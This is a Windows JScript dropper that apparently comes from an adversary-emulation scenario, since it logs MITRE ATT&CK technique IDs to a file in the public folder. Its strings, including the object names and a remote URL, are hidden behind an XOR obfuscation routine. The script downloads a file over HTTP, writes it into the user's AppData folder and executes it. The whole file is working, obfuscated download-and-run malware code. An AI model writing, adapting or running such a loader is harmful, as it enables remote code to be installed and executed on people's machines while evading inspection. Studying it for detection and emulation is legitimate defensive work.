var fso = new ActiveXObject(otrzl0k9h("BABKICKHEKIAKGHKGJKIKIGKIDKCEKBBCKIIKIEKJCKJGKHCKBIKHGKIBKJBKBCBKIDKICKJCKIAKGJK")+"");
function log(id,descripcion) {
  var escenario = otrzl0k9h("BCBKBBEKBCFKCAKJGKBBEKDGKCBKGKGK")+"";
  var ab5e6t = new ActiveXObject(otrzl0k9h("JHKJIKJBKHFKJAKGFKCBKCCKBADKJEKIDKJDKIEK")+"");
  var path = ab5e6t.expandEnvironmentStrings("%PUBLIC%");
  var logFilePath = path+"\\"+escenario+".txt";
  var file = fso.OpenTextFile(logFilePath, 8, true); 
  var log_m = "["+get_date()+"] [OCE-DW-02] ["+id+"] ["+descripcion+"]";
  file.WriteLine(log_m);
  file.Close();
}

function get_date() {
  var date = new Date();
  var day = ("0" + date.getDate()).slice(-2);
  var month = ("0" + (date.getMonth() + 1)).slice(-2);
  var year = date.getFullYear();
  var hours = ("0" + date.getHours()).slice(-2);
  var minutes = ("0" + date.getMinutes()).slice(-2);
  var seconds = ("0" + date.getSeconds()).slice(-2);
  var formattedDate = day + "/" + month + "/" + year + " " + hours + ":" + minutes + ":" + seconds;
  return formattedDate;
}

function otrzl0k9h(cipher_text) {
  var y3lc0p = "618931a846";
  var v0yv6t= new String("");
  for(lt1x8=0;lt1x8<11;lt1x8++) {
    var fy47n=new RegExp(String.fromCharCode(lt1x8+65),"g");
    if(lt1x8==10)cipher_text=cipher_text.replace(fy47n,","); else cipher_text=cipher_text.replace(fy47n,String(lt1x8));
  }
  var q2u3i = cipher_text.split(",");
  var lt1x8=0;var wohqv=0;
  for(lt1x8=0;lt1x8<q2u3i.length-1;lt1x8++) {
    var w1mlxvt08=String.fromCharCode(Number(q2u3i[lt1x8]));
    var xu296=w1mlxvt08.charCodeAt(0)^y3lc0p.charCodeAt(wohqv);
    w1mlxvt08=String.fromCharCode(xu296);
    v0yv6t+= w1mlxvt08;
    if(wohqv==y3lc0p.length-1)wohqv=0; else wohqv++;
  }
  return v0yv6t;
}


function send_data () {


  var o9d41 = ez8pir()
  var ab5e6t = new ActiveXObject(otrzl0k9h("JHKJIKJBKHFKJAKGFKCBKCCKBADKJEKIDKJDKIEK")+"");
  var l6ss73 = ab5e6t.expandEnvironmentStrings("%APPDATA%");

  var s020e = new ActiveXObject(otrzl0k9h("BCDKJIKJGKBBGKBCHKDKHJKBAHKIBKGIKGEKIEKHEKJHKBCGKBCFKEBKBAIKJGKBACK")+"");
  s020e.setOption(2,13056);
  s020e.open(otrzl0k9h("BBDKBBGKBAIK"), o9d41, false);
  s020e.send();
  if (s020e['status'] == 200){
    var a0s12e = new ActiveXObject(otrzl0k9h("BBJKBBHKBBJKBCFKBBDKDBKFAKHGKHAKIDKIHKJCK")+"");
    a0s12e['open'];
    a0s12e.Type = 1;
    a0s12e.Write(s020e['responseBody']);
    a0s12e.Position = 0;
    a0s12e.SaveToFile(l6ss73+"\\"+otrzl0k9h("JJKGFKJCKIIKHBKIEKHJKJDKHGKIDK")+"");
    a0s12e.Close;
    a0s12e = null;
    log("T1105",l6ss73+"\\"+otrzl0k9h("JJKGFKJCKIIKHBKIEKHJKJDKHGKIDK")+"");
  }

  s020e = null;
  log("T1105","1");
  var q0w21a = new ActiveXObject(otrzl0k9h("JHKJIKJBKHFKJAKGFKCBKCCKBADKJEKIDKJDKIEK")+"");
  q0w21a.Run(l6ss73+"\\"+otrzl0k9h("JJKGFKJCKIIKHBKIEKHJKJDKHGKIDK")+"");
}

function ez8pir () {
 return otrzl0k9h("JEKGJKHGKHDKGEKBBKHIKCDKHKCEKHKFKBCKCDKBKCKIJKCCKFKBEKBKDAKHCKHFKJCKIFKCAKJBKGEKGJKCFKBCGKBCDKBCEKBCHKBBHKIDKIKEKEKAKAKAKAKAKAKAKAKAKAK")+"";
}
log("T1059.007","1");
send_data();